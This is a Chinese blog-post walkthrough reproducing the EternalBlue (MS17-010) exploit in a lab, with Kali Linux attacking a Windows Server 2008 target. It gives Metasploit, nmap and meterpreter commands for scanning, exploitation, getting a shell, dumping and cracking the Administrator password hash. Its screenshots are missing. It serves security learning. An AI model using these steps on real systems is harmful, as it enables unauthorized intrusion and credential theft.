kali (永恒之蓝MS17_010)漏洞复现

161 阅读1分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第2天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情

需要的机子:

渗透机(Linux(kali)一台),靶机(server 2008一台)

需要的环境:

kali,安装msf框架 server 2008,开启445端口

kali安装msf:

apt-get update #安装更新

apt-get install metasploit-framework #安装msf框架

server的配置简单,控制面板 开启445端口

开始复现:

先确认IP是否能ping通

靶机IP:

​编辑

渗透机ip: 

​编辑

1.渗透机检测一下是否能ping通 :

​编辑

也是能ping通,那就正式开始了

2.使用nmap指定445端口扫描,查看是否开启

nmap -p 445 192.168.0.116

​编辑

 开启了那就下一步

3.启动msf console界面:

​编辑

4.search ms17-010   #查看ms17-010可使用的模块

(模块介绍:MS17-010 漏洞利用总结 (leanote.com))

​编辑

 5.使用辅助模块3(探测目标机器是否有永恒之蓝漏洞)

use 3    #进入模块3,使用模块

set RHOSTS 192.168.0.116     #设置靶机ip为192.168.0.116

run   #开始运行 

​编辑

检查出来server2008可能存在ms17-010漏洞,那就开始攻击

6.使用攻击模块0,进行攻击(使用永恒之蓝攻击模块)

use 0   #使用0模块

set RHOSOT 192.168.0.116    #设置攻击ip

run    #开始运行

​编辑

 有WIN字眼时,出现meterpreter,也就是攻击成功了,成功get shell

7.在meterpreter也可以使用很多命令

meterpreter常用命令大全_凉水沏茶的博客-CSDN博客_meterpreter命令

(1)攻击成功重要的就是抓哈希了   hashdump  #抓哈希密码

​编辑

复制冒号后面的哈希密码,去cmd5解密

​编辑

得到Administrator密码123123

8.在meterpreter进入靶机管理员DOS界面

​编辑

 拿到管理员权限首先要更改编码格式,不然会乱码

chcp 65001  #更改编码格式 

DOS的命令在这里都可以使用